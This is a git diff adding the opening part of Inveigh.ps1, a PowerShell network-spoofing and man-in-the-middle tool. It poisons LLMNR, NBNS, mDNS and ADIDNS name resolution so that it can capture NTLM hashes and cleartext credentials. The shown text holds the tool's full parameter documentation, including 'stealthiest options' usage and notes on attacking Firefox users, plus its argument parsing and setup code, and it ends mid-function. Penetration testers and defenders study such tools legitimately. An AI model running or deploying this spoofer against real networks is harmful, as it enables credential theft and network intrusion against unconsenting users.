diff options
Diffstat (limited to 'Inveigh.ps1')
| -rw-r--r-- | Inveigh.ps1 | 6117 |
1 files changed, 6117 insertions, 0 deletions
diff --git a/Inveigh.ps1 b/Inveigh.ps1 new file mode 100644 index 0000000..cbeaf43 --- /dev/null +++ b/Inveigh.ps1 @@ -0,0 +1,6117 @@ +function Invoke-Inveigh +{ +<# +.SYNOPSIS +This function is a Windows PowerShell ADIDNS/LLMNR/NBNS/mDNS spoofer. + +.DESCRIPTION +This function is a Windows PowerShell ADIDNS/LLMNR/NBNS/mDNS spoofer/man-in-the-middle tool with +challenge/response capture over HTTP/HTTPS/Proxy/SMB. + +.PARAMETER ADIDNS +Default = Disabled: (Combo/Wildcard) Enable an ADIDNS spoofing attack. Combo looks at LLMNR/NBNS requests and adds +a record to DNS if the same request is received from multiple systems. Wildcard injects a wildcard record. + +.PARAMETER ADIDNSCleanup +Default = Enabled: Enable/Disable removing added ADIDNS records upon shutdown. + +.PARAMETER ADIDNSCredential +PSCredential object that will be used with ADIDNS spoofing. + +.PARAMETER ADIDNSDomain +The targeted domain in DNS format. + +.PARAMETER ADIDNSDomainController +Domain controller to target. This parameter is mandatory on a non-domain attached system. + +.PARAMETER ADIDNSForest +The targeted forest in DNS format. + +.PARAMETER ADIDNSHostsIgnore +Comma seperated list of hosts that will be ignored with ADIDNS spoofing. + +.PARAMETER ADIPartition +Default = DomainDNSZones: (DomainDNSZones,ForestDNSZone,System) The AD partition name where the zone is stored. + +.PARAMETER ADIDNSThreshold +Default = 4: The threshold used to determine when ADIDNS records are injected for the combo attack. Inveigh will +track identical LLMNR and NBNS requests received from multiple systems. DNS records will be injected once the +system count for identical LLMNR and NBNS requests exceeds the threshold. + +.PARAMETER ADIDNSTTL +Default = 600 Seconds: DNS TTL in seconds for added A records. + +.PARAMETER ADIDNSZone +The ADIDNS zone. + +.PARAMETER Challenge +Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random +challenge will be generated for each request. + +.PARAMETER ConsoleOutput +Default = Disabled: (Low/Medium/Y/N) Enable/Disable real time console output. If using this option through a +shell, test to ensure that it doesn't hang the shell. Medium and Low can be used to reduce output. + +.PARAMETER ConsoleQueueLimit +Default = Unlimited: Maximum number of queued up console log entries when not using the real time console. + +.PARAMETER ConsoleStatus +(Integer) Interval in minutes for displaying all unique captured hashes and credentials. This is useful for +displaying full capture lists when running through a shell that does not have access to the support functions. + +.PARAMETER ConsoleUnique +Default = Enabled: (Y/N) Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname, +and username combinations when real time console output is enabled. + +.PARAMETER ElevatedPrivilege +Default = Auto: (Auto/Y/N) Set the privilege mode. Auto will determine if Inveigh is running with +elevated privilege. If so, options that require elevated privilege can be used. + +.PARAMETER EvadeRG +Defauly = Enabled: (Y/N) Enable/Disable detecting and ignoring LLMNR/NBNS requests sent directly to an IP address +rather than a broadcast/multicast address. This technique is used by ResponderGuard to discover spoofers across +subnets. + +.PARAMETER FileOutput +Default = Disabled: (Y/N) Enable/Disable real time file output. + +.PARAMETER FileOutputDirectory +Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must +also be enabled. + +.PARAMETER FileUnique +Default = Enabled: (Y/N) Enable/Disable outputting challenge/response hashes for only unique IP, domain/hostname, +and username combinations when real time file output is enabled. + +.PARAMETER HTTP +Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture. + +.PARAMETER HTTPIP +Default = Any: IP address for the HTTP/HTTPS listener. + +.PARAMETER HTTPPort +Default = 80: TCP port for the HTTP listener. + +.PARAMETER HTTPAuth +Default = NTLM: (Anonymous/Basic/NTLM/NTLMNoESS) HTTP/HTTPS listener authentication type. This setting does not +apply to wpad.dat requests. NTLMNoESS turns off the 'Extended Session Security' flag during negotiation. + +.PARAMETER HTTPBasicRealm +Realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth. + +.PARAMETER HTTPContentType +Default = text/html: Content type for HTTP/HTTPS/Proxy responses. Does not apply to EXEs and wpad.dat. Set to +"application/hta" for HTA files or when using HTA code with HTTPResponse. + +.PARAMETER HTTPDir +Full directory path to enable hosting of basic content through the HTTP/HTTPS listener. + +.PARAMETER HTTPDefaultFile +Filename within the HTTPDir to serve as the default HTTP/HTTPS/Proxy response file. This file will not be used for +wpad.dat requests. + +.PARAMETER HTTPDefaultEXE +EXE filename within the HTTPDir to serve as the default HTTP/HTTPS/Proxy response for EXE requests. + +.PARAMETER HTTPResponse +Content to serve as the default HTTP/HTTPS/Proxy response. This response will not be used for wpad.dat requests. +This parameter will not be used if HTTPDir is set. Use PowerShell character escapes and newlines where necessary. + +.PARAMETER HTTPS +Default = Disabled: (Y/N) Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in +the local store. If the script does not exit gracefully, manually remove the certificate. This feature requires +local administrator access. + +.PARAMETER HTTPSPort +Default = 443: TCP port for the HTTPS listener. + +.PARAMETER HTTPSCertIssuer +Default = Inveigh: The issuer field for the cert that will be installed for HTTPS. + +.PARAMETER HTTPSCertSubject +Default = localhost: The subject field for the cert that will be installed for HTTPS. + +.PARAMETER HTTPSForceCertDelete +Default = Disabled: (Y/N) Force deletion of an existing certificate that matches HTTPSCertIssuer and +HTTPSCertSubject. + +.PARAMETER Inspect +(Switch) Inspect LLMNR/mDNS/NBNS traffic only. With elevated privilege, SMB must be disabled with -smb if you do +not want NTLMv1/NTLMv2 captures over SMB. Without elevated privilege, the desired inspect listeners must be +enabled. + +.PARAMETER IP +Local IP address for listening and packet sniffing. This IP address will also be used for LLMNR/NBNS/mDNS/DNS spoofing +if the SpooferIP parameter is not set. + +.PARAMETER LogOutput +Default = Enabled: (Y/N) Enable/Disable storing log messages in memory. + +.PARAMETER LLMNR +Default = Enabled: (Y/N) Enable/Disable LLMNR spoofing. + +.PARAMETER LLMNRTTL +Default = 30 Seconds: LLMNR TTL in seconds for the response packet. + +.PARAMETER MachineAccounts +Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts. + +.PARAMETER mDNS +Default = Disabled: (Y/N) Enable/Disable mDNS spoofing. + +.PARAMETER mDNSTTL +Default = 120 Seconds: mDNS TTL in seconds for the response packet. + +.PARAMETER mDNSTypes +Default = QU: Comma separated list of mDNS types to spoof. Note that QM will send the response to 224.0.0.251. +Types include QU = Query Unicast, QM = Query Multicast + +.PARAMETER NBNS +Default = Disabled: (Y/N) Enable/Disable NBNS spoofing. + +.PARAMETER NBNSBruteForce +Default = Disabled: (Y/N) Enable/Disable NBNS brute force spoofer. + +.PARAMETER NBNSBruteForceHost +Default = WPAD: Hostname for the NBNS Brute Force spoofer. + +.PARAMETER NBNSBruteForcePause +Default = Disabled: (Integer) Number of seconds the NBNS brute force spoofer will stop spoofing after an incoming +HTTP request is received. + +.PARAMETER NBNSBruteForceTarget +IP address to target for NBNS brute force spoofing. + +.PARAMETER NBNSTTL +Default = 165 Seconds: NBNS TTL in seconds for the response packet. + +.PARAMETER NBNSTypes +Default = 00,20: Comma separated list of NBNS types to spoof. +Types include 00 = Workstation Service, 03 = Messenger Service, 20 = Server Service, 1B = Domain Name + +.PARAMETER OutputStreamOnly +Default = Disabled: (Y/N) Enable/Disable forcing all output to the standard output stream. This can be helpful if +running Inveigh through a shell that does not return other output streams. Note that you will not see the various +yellow warning messages if enabled. + +.PARAMETER Proxy +Default = Disabled: (Y/N) Enable/Disable proxy listener authentication captures. + +.PARAMETER ProxyAuth +Default = NTLM: (Basic/NTLM/NTLMNoESS) Proxy listener authentication type. + +.PARAMETER ProxyIP +Default = Any: IP address for the proxy listener. + +.PARAMETER ProxyPort +Default = 8492: TCP port for the proxy listener. + +.PARAMETER ProxyIgnore +Default = Firefox: Comma separated list of keywords to use for filtering browser user agents. Matching browsers +will not be sent the wpad.dat file used for capturing proxy authentications. Firefox does not work correctly +with the proxy server failover setup. Firefox will be left unable to connect to any sites until the proxy is +cleared. Remove "Firefox" from this list to attack Firefox. If attacking Firefox, consider setting +-SpooferRepeat N to limit attacks against a single target so that victims can recover Firefox connectivity by +closing and reopening. + +.PARAMETER RunCount +Default = Unlimited: (Integer) Number of NTLMv1/NTLMv2/cleartext captures to perform before auto-exiting. + +.PARAMETER RunTime +(Integer) Run time duration in minutes. + +.PARAMETER ShowHelp +Default = Enabled: (Y/N) Enable/Disable the help messages at startup. + +.PARAMETER SMB +Default = Enabled: (Y/N) Enable/Disable SMB challenge/response capture. Warning, LLMNR/NBNS spoofing can still +direct targets to the host system's SMB server. Block TCP ports 445/139 or kill the SMB services if you need to +prevent login requests from being processed by the Inveigh host. + +.PARAMETER SpooferHostsIgnore +Default = All: Comma separated list of requested hostnames to ignore when spoofing with LLMNR/mDNS/NBNS. + +.PARAMETER SpooferHostsReply +Default = All: Comma separated list of requested hostnames to respond to when spoofing with LLMNR/mDNS/NBNS. + +.PARAMETER SpooferIP +IP address for ADIDNS/LLMNR/mDNS/NBNS spoofing. This parameter is only necessary when redirecting victims to a system +other than the Inveigh host. + +.PARAMETER SpooferIPsIgnore +Default = All: Comma separated list of source IP addresses to ignore when spoofing with LLMNR/mDNS/NBNS. + +.PARAMETER SpooferIPsReply +Default = All: Comma separated list of source IP addresses to respond to when spoofing with LLMNR/mDNS/NBNS. + +.PARAMETER SpooferLearning +Default = Disabled: (Y/N) Enable/Disable LLMNR/NBNS valid host learning. If enabled, Inveigh will send out +LLMNR/NBNS requests for any received LLMNR/NBNS requests. If a response is received, Inveigh will add the +hostname to a spoofing blacklist. + +.PARAMETER SpooferLearningDelay +(Integer) Time in minutes that Inveigh will delay spoofing while valid hosts are being blacklisted through +SpooferLearning. + +.PARAMETER SpooferLearningInterval +Default = 30 Minutes: (Integer) Time in minutes that Inveigh wait before sending out an LLMNR/NBNS request for a +hostname that has already been checked if SpooferLearning is enabled. + +.PARAMETER SpooferNonprintable +Default = Enabled: (Y/N) Enable/Disable answering LLMNR/NBNS requests for non-printable host names. + +.PARAMETER SpooferRepeat +Default = Enabled: (Y/N) Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user +challenge/response has been captured. + +.PARAMETER SpooferThresholdHost +(Integer) Number of matching LLMNR/NBNS name requests to receive before Inveigh will begin responding to those +requests. + +.PARAMETER SpooferThresholdNetwork +(Integer) Number of matching LLMNR/NBNS requests to receive from different systems before Inveigh will begin +responding to those requests. + +.PARAMETER StartupChecks +Default = Enabled: (Y/N) Enable/Disable checks for in use ports and running services on startup. + +.PARAMETER StatusOutput +Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages. + +.PARAMETER Tool +Default = 0: (0/1/2) Enable/Disable features for better operation through external tools such as Meterpreter's +PowerShell extension, Metasploit's Interactive PowerShell Sessions payloads and Empire. +0 = None, 1 = Metasploit/Meterpreter, 2 = Empire + +.PARAMETER WPADAuth +Default = NTLM: (Anonymous/Basic/NTLM/NTLMNoESS) HTTP/HTTPS listener authentication type for wpad.dat requests. +Setting to Anonymous can prevent browser login prompts. NTLMNoESS turns off the 'Extended Session Security' flag +during negotiation. + +.PARAMETER WPADAuthIgnore +Default = Firefox: Comma separated list of keywords to use for filtering browser user agents. Matching browsers +will be skipped for NTLM authentication. This can be used to filter out browsers like Firefox that display login +popups for authenticated wpad.dat requests such as Firefox. + +.PARAMETER WPADDirectFile +Default = Enabled: (Y/N) Enable/Disable serving a proxyless, all direct, wpad.dat file for wpad.dat requests. +Enabling this setting can reduce the amount of redundant wpad.dat requests. This parameter is ignored when +using WPADIP, WPADPort, or WPADResponse. + +.PARAMETER WPADDirectHosts +Comma separated list of hosts to list as direct in the wpad.dat file. Listed hosts will not be routed through the +defined proxy. + +.PARAMETER WPADIP +Proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used +with WPADPort. + +.PARAMETER WPADPort +Proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be +used with WPADIP. + +.PARAMETER WPADResponse +wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and WPADPort +are set. Use PowerShell character escapes where necessary. + +.EXAMPLE +Import-Module .\Inveigh.psd1;Invoke-Inveigh +Import full module and execute with all default settings. + +.EXAMPLE +. ./Inveigh.ps1;Invoke-Inveigh -IP 192.168.1.10 +Dot source load and execute specifying a specific local listening/spoofing IP. + +.EXAMPLE +Invoke-Inveigh -IP 192.168.1.10 -HTTP N +Execute specifying a specific local listening/spoofing IP and disabling HTTP challenge/response. + +.EXAMPLE +Invoke-Inveigh -SpooferRepeat N -WPADAuth Anonymous -SpooferHostsReply host1,host2 -SpooferIPsReply 192.168.2.75,192.168.2.76 +Execute with the stealthiest options. + +.EXAMPLE +Invoke-Inveigh -Inspect +Execute in order to only inpect LLMNR/mDNS/NBNS traffic. + +.EXAMPLE +Invoke-Inveigh -IP 192.168.1.10 -SpooferIP 192.168.2.50 -HTTP N +Execute specifying a specific local listening IP and a LLMNR/NBNS spoofing IP on another subnet. This may be +useful for sending traffic to a controlled Linux system on another subnet. + +.EXAMPLE +Invoke-Inveigh -HTTPResponse "<html><head><meta http-equiv='refresh' content='0; url=https://duckduckgo.com/'></head></html>" +Execute specifying an HTTP redirect response. + +.LINK +https://github.com/Kevin-Robertson/Inveigh +#> + +#region begin parameters + +# Parameter default values can be modified in this section: +[CmdletBinding()] +param +( + [parameter(Mandatory=$false)][Array]$ADIDNSHostsIgnore = ("isatap","wpad"), + [parameter(Mandatory=$false)][Array]$ProxyIgnore = "Firefox", + [parameter(Mandatory=$false)][Array]$SpooferHostsReply = "", + [parameter(Mandatory=$false)][Array]$SpooferHostsIgnore = "", + [parameter(Mandatory=$false)][Array]$SpooferIPsReply = "", + [parameter(Mandatory=$false)][Array]$SpooferIPsIgnore = "", + [parameter(Mandatory=$false)][Array]$WPADDirectHosts = "", + [parameter(Mandatory=$false)][Array]$WPADAuthIgnore = "Firefox", + [parameter(Mandatory=$false)][Int]$ConsoleQueueLimit = "-1", + [parameter(Mandatory=$false)][Int]$ConsoleStatus = "", + [parameter(Mandatory=$false)][Int]$ADIDNSThreshold = "4", + [parameter(Mandatory=$false)][Int]$ADIDNSTTL = "600", + [parameter(Mandatory=$false)][Int]$HTTPPort = "80", + [parameter(Mandatory=$false)][Int]$HTTPSPort = "443", + [parameter(Mandatory=$false)][Int]$LLMNRTTL = "30", + [parameter(Mandatory=$false)][Int]$mDNSTTL = "120", + [parameter(Mandatory=$false)][Int]$NBNSTTL = "165", + [parameter(Mandatory=$false)][Int]$NBNSBruteForcePause = "", + [parameter(Mandatory=$false)][Int]$ProxyPort = "8492", + [parameter(Mandatory=$false)][Int]$RunCount = "", + [parameter(Mandatory=$false)][Int]$RunTime = "", + [parameter(Mandatory=$false)][Int]$WPADPort = "", + [parameter(Mandatory=$false)][Int]$SpooferLearningDelay = "", + [parameter(Mandatory=$false)][Int]$SpooferLearningInterval = "30", + [parameter(Mandatory=$false)][Int]$SpooferThresholdHost = "0", + [parameter(Mandatory=$false)][Int]$SpooferThresholdNetwork = "0", + [parameter(Mandatory=$false)][String]$ADIDNSDomain = "", + [parameter(Mandatory=$false)][String]$ADIDNSDomainController = "", + [parameter(Mandatory=$false)][String]$ADIDNSForest = "", + [parameter(Mandatory=$false)][String]$ADIDNSZone = "", + [parameter(Mandatory=$false)][String]$HTTPBasicRealm = "IIS", + [parameter(Mandatory=$false)][String]$HTTPContentType = "text/html", + [parameter(Mandatory=$false)][String]$HTTPDefaultFile = "", + [parameter(Mandatory=$false)][String]$HTTPDefaultEXE = "", + [parameter(Mandatory=$false)][String]$HTTPResponse = "", + [parameter(Mandatory=$false)][String]$HTTPSCertIssuer = "Inveigh", + [parameter(Mandatory=$false)][String]$HTTPSCertSubject = "localhost", + [parameter(Mandatory=$false)][String]$NBNSBruteForceHost = "WPAD", + [parameter(Mandatory=$false)][String]$WPADResponse = "", + [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge = "", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleUnique = "Y", + [parameter(Mandatory=$false)][ValidateSet("Combo","Wildcard")][String]$ADIDNS, + [parameter(Mandatory=$false)][ValidateSet("DomainDNSZones","ForestDNSZones","System")][String]$ADIDNSPartition = "DomainDNSZones", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ADIDNSCleanup = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$EvadeRG = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileOutput = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileUnique = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTP = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPS = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPSForceCertDelete = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$LLMNR = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$LogOutput = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$MachineAccounts = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$mDNS = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$NBNS = "", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$NBNSBruteForce = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$OutputStreamOnly = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$Proxy = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SMB = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SpooferLearning = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SpooferNonprintable = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SpooferRepeat = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StatusOutput = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$WPADDirectFile = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StartupChecks = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N","Low","Medium")][String]$ConsoleOutput = "N", + [parameter(Mandatory=$false)][ValidateSet("Auto","Y","N")][String]$ElevatedPrivilege = "Auto", + [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM","NTLMNoESS")][String]$HTTPAuth = "NTLM", + [parameter(Mandatory=$false)][ValidateSet("QU","QM")][Array]$mDNSTypes = @("QU"), + [parameter(Mandatory=$false)][ValidateSet("00","03","20","1B","1C","1D","1E")][Array]$NBNSTypes = @("00","20"), + [parameter(Mandatory=$false)][ValidateSet("Basic","NTLM","NTLMNoESS")][String]$ProxyAuth = "NTLM", + [parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool = "0", + [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM","NTLMNoESS")][String]$WPADAuth = "NTLM", + [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$FileOutputDirectory = "", + [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$HTTPDir = "", + [parameter(Mandatory=$false)][Switch]$Inspect, + [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$HTTPIP = "0.0.0.0", + [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$IP = "", + [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$NBNSBruteForceTarget = "", + [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$ProxyIP = "0.0.0.0", + [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SpooferIP = "", + [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$WPADIP = "", + [parameter(Mandatory=$false)][System.Management.Automation.PSCredential]$ADIDNSCredential, + [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter +) + +#endregion +#region begin initialization +if($invalid_parameter) +{ + Write-Output "[-] $($invalid_parameter) is not a valid parameter" + throw +} + +$inveigh_version = "1.4" + +if(!$IP) +{ + + try + { + $IP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address) + } + catch + { + Write-Output "[-] Error finding local IP, specify manually with -IP" + throw + } + +} + +if(!$SpooferIP) +{ + $SpooferIP = $IP +} + +if($ADIDNS) +{ + + if(!$ADIDNSDomainController -or !$ADIDNSDomain -or $ADIDNSForest -or !$ADIDNSZone) + { + + try + { + $current_domain = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() + } + catch + { + Write-Output "[-] $($_.Exception.Message)" + throw + } + + if(!$ADIDNSDomainController) + { + $ADIDNSDomainController = $current_domain.PdcRoleOwner.Name + } + + if(!$ADIDNSDomain) + { + $ADIDNSDomain = $current_domain.Name + } + + if(!$ADIDNSForest) + { + $ADIDNSForest = $current_domain.Forest + } + + if(!$ADIDNSZone) + { + $ADIDNSZone = $current_domain.Name + } + + } + +} + +if($HTTPDefaultFile -or $HTTPDefaultEXE) +{ + + if(!$HTTPDir) + { + Write-Output "[-] You must specify an -HTTPDir when using either -HTTPDefaultFile or -HTTPDefaultEXE" + throw + } + +} + +if($WPADIP -or $WPADPort) +{ + + if(!$WPADIP) + { + Write-Output "[-] You must specify a -WPADPort to go with -WPADIP" + throw + } + + if(!$WPADPort) + { + Write-Output "[-] You must specify a -WPADIP to go with -WPADPort" + throw + } + +} + +if($NBNSBruteForce -eq 'Y' -and !$NBNSBruteForceTarget) +{ + Write-Output "[-] You must specify a -NBNSBruteForceTarget if enabling -NBNSBruteForce" + throw +} + +if(!$FileOutputdirectory) +{ + $output_directory = $PWD.Path +} +else +{ + $output_directory = $FileOutputdirectory +} + +if(!$inveigh) +{ + $global:inveigh = [HashTable]::Synchronized(@{}) + $inveigh.cleartext_list = New-Object System.Collections.ArrayList + $inveigh.enumerate = New-Object System.Collections.ArrayList + $inveigh.IP_capture_list = New-Object System.Collections.ArrayList + $inveigh.log = New-Object System.Collections.ArrayList + $inveigh.NTLMv1_list = New-Object System.Collections.ArrayList + $inveigh.NTLMv1_username_list = New-Object System.Collections.ArrayList + $inveigh.NTLMv2_list = New-Object System.Collections.ArrayList + $inveigh.NTLMv2_username_list = New-Object System.Collections.ArrayList + $inveigh.POST_request_list = New-Object System.Collections.ArrayList + $inveigh.valid_host_list = New-Object System.Collections.ArrayList + $inveigh.ADIDNS_table = [HashTable]::Synchronized(@{}) + $inveigh.relay_privilege_table = [HashTable]::Synchronized(@{}) + $inveigh.relay_failed_login_table = [HashTable]::Synchronized(@{}) + $inveigh.relay_history_table = [HashTable]::Synchronized(@{}) + $inveigh.request_table = [HashTable]::Synchronized(@{}) + $inveigh.session_socket_table = [HashTable]::Synchronized(@{}) + $inveigh.session_table = [HashTable]::Synchronized(@{}) + $inveigh.session_message_ID_table = [HashTable]::Synchronized(@{}) + $inveigh.session_lock_table = [HashTable]::Synchronized(@{}) + $inveigh.SMB_session_table = [HashTable]::Synchronized(@{}) + $inveigh.domain_mapping_table = [HashTable]::Synchronized(@{}) + $inveigh.group_table = [HashTable]::Synchronized(@{}) + $inveigh.session_count = 0 + $inveigh.session = @() +} + +if($inveigh.running) +{ + Write-Output "[-] Inveigh is already running" + throw +} + +$inveigh.stop = $false + +if(!$inveigh.relay_running) +{ + $inveigh.cleartext_file_queue = New-Object System.Collections.ArrayList + $inveigh.console_queue = New-Object System.Collections.ArrayList + $inveigh.HTTP_challenge_queue = New-Object System.Collections.ArrayList + $inveigh.log_file_queue = New-Object System.Collections.ArrayList + $inveigh.NTLMv1_file_queue = New-Object System.Collections.ArrayList + $inveigh.NTLMv2_file_queue = New-Object System.Collections.ArrayList + $inveigh.output_queue = New-Object System.Collections.ArrayList + $inveigh.POST_request_file_queue = New-Object System.Collections.ArrayList + $inveigh.console_input = $true + $inveigh.console_output = $false + $inveigh.file_output = $false + $inveigh.HTTPS_existing_certificate = $false + $inveigh.HTTPS_force_certificate_delete = $false + $inveigh.log_output = $true + $inveigh.cleartext_out_file = $output_directory + "\Inveigh-Cleartext.txt" + $inveigh.log_out_file = $output_directory + "\Inveigh-Log.txt" + $inveigh.NTLMv1_out_file = $output_directory + "\Inveigh-NTLMv1.txt" + $inveigh.NTLMv2_out_file = $output_directory + "\Inveigh-NTLMv2.txt" + $inveigh.POST_request_out_file = $output_directory + "\Inveigh-FormInput.txt" +} + +if($ElevatedPrivilege -eq 'Auto') +{ + $elevated_privilege = [Bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544") +} +else +{ + + if($ElevatedPrivilege -eq 'Y') + { + $elevated_privilege_check = [Bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544") + $elevated_privilege = $true + } + else + { + $elevated_privilege = $false + } + +} + +if($StartupChecks -eq 'Y') +{ + + $firewall_status = netsh advfirewall show allprofiles state | Where-Object {$_ -match 'ON'} + + if($HTTP -eq 'Y') + { + $HTTP_port_check = netstat -anp TCP | findstr LISTENING | findstr /C:"$HTTPIP`:$HTTPPort " + } + + if($HTTPS -eq 'Y') + { + $HTTPS_port_check = netstat -anp TCP | findstr LISTENING | findstr /C:"$HTTPIP`:$HTTPSPort " + } + + if($Proxy -eq 'Y') + { + $proxy_port_check = netstat -anp TCP | findstr LISTENING | findstr /C:"$HTTPIP`:$ProxyPort " + } + + if($LLMNR -eq 'Y' -and !$elevated_privilege) + { + $LLMNR_port_check = netstat -anp UDP | findstr /C:"0.0.0.0:5355 " + } + + if($mDNS -eq 'Y' -and !$elevated_privilege) + { + $mDNS_port_check = netstat -anp UDP | findstr /C:"0.0.0.0:5353 " + } + +} + +if(!$elevated_privilege) +{ + + if($HTTPS -eq 'Y') + { + Write-Output "[-] HTTPS requires elevated privileges" + throw + } + + if($SpooferLearning -eq 'Y') + { + Write-Output "[-] SpooferLearning requires elevated privileges" + throw + } + + if(!$NBNS) + { + $NBNS = "Y" + } + + $SMB = "N" +} +else +{ + + if(!$NBNS) + { + $NBNS = "N" + } + +} + +$inveigh.hostname_spoof = $false +$inveigh.running = $true + +if($StatusOutput -eq 'Y') +{ + $inveigh.status_output = $true +} +else +{ + $inveigh.status_output = $false +} + +if($OutputStreamOnly -eq 'Y') +{ + $inveigh.output_stream_only = $true +} +else +{ + $inveigh.output_stream_only = $false +} + +if($Inspect) +{ + + if($elevated_privilege) + { + $LLMNR = "N" + $mDNS = "N" + $NBNS = "N" + $HTTP = "N" + $HTTPS = "N" + $Proxy = "N" + } + else + { + $HTTP = "N" + $HTTPS = "N" + $Proxy = "N" + } + +} + +if($Tool -eq 1) # Metasploit Interactive PowerShell Payloads and Meterpreter's PowerShell Extension +{ + $inveigh.tool = 1 + $inveigh.output_stream_only = $true + $inveigh.newline = $null + $ConsoleOutput = "N" + +} +elseif($Tool -eq 2) # PowerShell Empire +{ + $inveigh.tool = 2 + $inveigh.output_stream_only = $true + $inveigh.console_input = $false + $inveigh.newline = $null + $LogOutput = "N" + $ShowHelp = "N" + + switch ($ConsoleOutput) + { + + 'Low' + { + $ConsoleOutput = "Low" + } + + 'Medium' + { + $ConsoleOutput = "Medium" + } + + default + { + $ConsoleOutput = "Y" + } + + } + +} +else +{ + $inveigh.tool = 0 + $inveigh.newline = $null +} + +$inveigh.netBIOS_domain = (Get-ChildItem -path env:userdomain).Value +$inveigh.computer_name = (Get-ChildItem -path env:computername).Value + +try +{ + $inveigh.DNS_domain = ((Get-ChildItem -path env:userdnsdomain -ErrorAction 'SilentlyContinue').Value).ToLower() + $inveigh.DNS_computer_name = ($inveigh.computer_name + "." + $inveigh.DNS_domain).ToLower() + + if(!$inveigh.domain_mapping_table.($inveigh.netBIOS_domain)) + { + $inveigh.domain_mapping_table.Add($inveigh.netBIOS_domain,$inveigh.DNS_domain) + } + +} +catch +{ + $inveigh.DNS_domain = $inveigh.netBIOS_domain + $inveigh.DNS_computer_name = $inveigh.computer_name +} + +if($inveigh.relay_running) +{ + # $inveigh.output_pause = $true +} + +#endregion +#region begin startup messages +$inveigh.output_queue.Add("[*] Inveigh $inveigh_version started at $(Get-Date -format s)") > $null + +if($ElevatedPrivilege -eq 'Y' -or $elevated_privilege) +{ + + if(($ElevatedPrivilege -eq 'Auto' -and $elevated_privilege) -or ($ElevatedPrivilege -eq 'Y' -and $elevated_privilege_check)) + { + $inveigh.output_queue.Add("[+] Elevated Privilege Mode = Enabled") > $null + } + else + { + $inveigh.output_queue.Add("[-] Elevated Privilege Mode Enabled But Check Failed") > $null + } + +} +else +{ + $inveigh.output_queue.Add("[!] Elevated Privilege Mode = Disabled") > $null + $SMB = "N" +} + +if($firewall_status) +{ + $inveigh.output_queue.Add("[!] Windows Firewall = Enabled") > $null +} + +$inveigh.output_queue.Add("[+] Primary IP Address = $IP") > $null + +if($LLMNR -eq 'Y' -or $mDNS -eq 'Y' -or $NBNS -eq 'Y') +{ + $inveigh.output_queue.Add("[+] Spoofer IP Address = $SpooferIP") > $null +} + +if($LLMNR -eq 'Y' -or $NBNS -eq 'Y') +{ + + if($SpooferThresholdHost -gt 0) + { + $inveigh.output_queue.Add("[+] Spoofer Threshold Host = $SpooferThresholdHost") > $null + } + + if($SpooferThresholdNetwork -gt 0) + { + $inveigh.output_queue.Add("[+] Spoofer Threshold Network = $SpooferThresholdNetwork") > $null + } + +} + +if($ADIDNS) +{ + $inveigh.ADIDNS = $ADIDNS + $inveigh.output_queue.Add("[+] ADIDNS Spoofer = $ADIDNS") > $null + 